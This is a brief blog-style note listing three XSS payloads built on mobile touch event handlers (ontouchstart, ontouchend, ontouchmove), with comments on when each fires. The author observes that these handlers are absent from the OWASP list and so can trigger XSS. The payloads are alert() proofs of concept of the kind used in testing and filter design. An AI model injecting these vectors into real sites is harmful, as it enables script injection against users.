Event handler for mobile used in XSS (ontouch*)

Some event handlers do not appear in the OWASP list. It is a touch event like ontouch*. It is a limited item on mobile devices, so it has a less effective effect than general purpose, but it is a good item to trigger XSS.

(In fact, sometimes I forgot this event handler. so i take a note!)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
<body ontouchstart=alert(45)> 
<body ontouchend=alert(45)>   
<body ontouchmove=alert(45)>  
<!-- 

[ ontouchstart ]
Triggers when a finger touch the screen

[ ontouchend ]
Triggers when a finger is removed from touch screen

[ ontouchmove ]
When a finger is dragged across the screen. 

-->

only mobile…, pc browser is not running code
Licensed under CC BY-NC-SA 4.0
Last updated on Jul 10, 2021 01:05 +0900